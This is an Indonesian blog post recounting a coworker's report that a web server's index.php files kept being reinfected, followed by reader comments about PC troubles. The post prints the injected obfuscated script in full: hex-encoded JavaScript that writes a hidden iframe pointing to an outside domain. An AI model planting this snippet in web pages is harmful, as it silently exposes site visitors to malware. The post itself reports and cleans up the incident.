iframe Malicious code attack!

Ada Pada Kategori: Ilmu Pengetahuan : Internet

Ni dari imel temen sekantorku tuh dear all,

aku tengarai server di typhoon disusupi virus/malware yg menanam kode skrip malicious malware ke file index.php. semua file dengan nama index.php selalu disusupi dan selalu diletakkan di baris akhir sebelum tag php (?>) oleh kode berikut: 

<script>function v49e44c24a6893(v49e44c24a705e){
return(parseInt(v49e44c24a705e,16));}function
 v49e44c24a8872(v49e44c24a8bbb){
var v49e44c24aa3d5=2; var v49e44c24a93ba='';for(v49e44c24a9b54=0;
v49e44c24a9b54<v49e44c24a8bbb .length; v49e44c24a9b54+=v49e44c24aa3d5){
v49e44c24a93ba+=(String.fromCharCode(v49e44c24a6893(
v49e44c24a8bbb.substr(v49e44c24a9b54, v49e44c24aa3d5))));}return
v49e44c24a93ba;}
document.write(v49e44c24a8872('3C696672616D65206E616
D653D27376238313139386327207372633
D27687474703A2F2F626C6163626F792E636F6D2F70
69632F676F2E7068703F7369643D3127207769
6474683D343431206865696768743D31333120737479
6C653D27646973706C61793A6E6F6E65273E3
C2F696672616D653E'));
</script>
</v49e44c24a8bbb></script>

tadi pagi aku sudah bersihkan kode tersebut di file index.php commbanktennis dan file index.php di folder2 yg lain spt photo gallery, index.php di cms CN, aku cek malam ini jam 3 an sudah terinfeksi juga dengan date modified di ftp menunjukkan perubahan jam 4.37 am, brarti jam tersebut skrip tsb menyusupi/disusupkan, padahal aku bersihkan file index.php tsb pagi hari tadi

aku sudah bersihkan lagi skrip2 malware tsb. kita lihat akan tahan berapa lama utk disusupi lagi.

dugaan, ada skrip tertanam di server typhoon yg selalu menginfeksi file2 index.php, atau karena ada virus di komputer kantor yg menanam (spt diskusi td pagi dg danar), tapi kemungkinan kedua ini sptnya kurang mendukung karena ketika aku upload/bersihkan file index.php yg bersih lsg aku cek sourcenya tidak ada, tapi bbrp waktu kemudian (bisa itungan jam dan hari) ke infeksi lagi…

aku pantau website commbank ini terus tp tidak menutup kemungkinan website2 yg lain juga kena, karena angin.com juga pernah disusupi juga”

Iya dan sering kali server kena masuk seperti ini, Maka aku coba cari jalan keluarnya, dan menurut artikel-artikel yang aku dapetkan dari mbah google, ternyata iframe code attack ini udah terjadi beberapa tahun sebelumnya seperti dilansir di sini

Kemudian, itu hanyalah penjelasannya, nah cari tau lebih dallem lagi dari mbah google ditemukan cara untuk menghapusnya lewat postingan dari diovo

Tapi yah, ternyata kita tetep saja harus ngedel satu persatu dari file index yang sudah tertanam iframe code tadi. Nasib dah, tapi gpp, dengan begini aku tahu apa langkah yang akan aku lakuin selanjutnya. Patch the server!!

Kata Kunci : Virus Code Attack, Iframe Code, Malicious Code

RSS Posted By D' fariztha

5 Comments »

The URI to TrackBack this entry is: http://aidi.blogsome.com/2009/04/15/iframe-malicious-code-attack/trackback/

  1. mas, wacanane kitab opo to yo, kok iso kabeh.. sesuk di tambahi mane yo, mosok mung semono rek…

    Comment by rengdaja-an — May , 4 2009 @ 12:48 pm

  2. wah, lali arep takon, PCku mbuh kene virus, opo wis rusak, aku gak ngerti. Tak uripi, cekleek, booting, troottroot… eeee kok gak nganti melebu nang tulisan wellcome….. clooroot, eeee booting maneh, terusan koyo ngono… opo`o yo?
    :pandadepresi:

    Comment by rengdaja-an — May , 4 2009 @ 12:54 pm

  3. @rengdaja-an “the father” yang tersayang huehue..
    Komputernya kenapa lagi? Masa tiap saat harus install ulang tuh.. kan kesian kompinya kan format bolak balik. Ntar jebol tuh.

    Klo booting ngga bisa itu ada beberapa sebab :
    1. Ada konfigurasi dari hardware yang ngga sempurna (bisa aja masangnya ngga pas ato kurang nancep). Ini bisa diperbaiki dengan memasang ulang piranti keras tersebut (lepas trus tancepkan lagi)
    2. Ada software driver yang ngga sempurna pas nginstall ato ngga kompatible (Biasanya juga muncul blue screen). Ini bisa diobati melewati safe mode (pada saat boting tekan F8, trus pilih safe mode). Trus dari add remove program, uninstall aja program yang sekiranya menjadikan PCnya hang. Coba diingat terakhir nginstall program apa.
    3. Ini bisa jadi ulah virus. Nah ini yang penanggulangannya butuh ketelatenan dan kesabaran ama pengetahuan kita sendiri tentang virus (banyak2 baca tentang virus dan pencegahannya aja). ini bisa ditanggulangi dengan masang antivirus, baik yang non comercial macam AVG ato commercial macam norton. Dan yang penting windowsnya selalu up to date (Aktifkan automatic updatenya). dan jangan lupa antivirusnya juga di update. Selain itu ya banyak2 cari info tentang malware, trojan, virus, hacktool dan sebagainya.

    Moga bermanfaat. :dory:

    Comment by aidi — May , 5 2009 @ 10:59 am

  4. gitu aja kok repooot, hehehe..
    sekarang os-nya vista ultimate genuine
    ngga pake crack, urunan 3 orang lalu aktivasi ke wakilnya mr.billgate, beres deh
    :pandaduit:

    Comment by rengdaja-an — June , 4 2009 @ 10:03 pm

  5. malicious malware itu apa mas??

    Comment by lippi — August , 12 2009 @ 5:49 pm

RSS feed for comments on this post.

Leave a comment

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>



Anti-spam measure: please retype the above text into the box provided.

Live Visitor...

NoCopy noRight [at] 2009 Allright Reserved. This site is purposed for personal use only
Get your free Wordpress blog at Blogsome.com
Dimas Fariztha's Facebook profile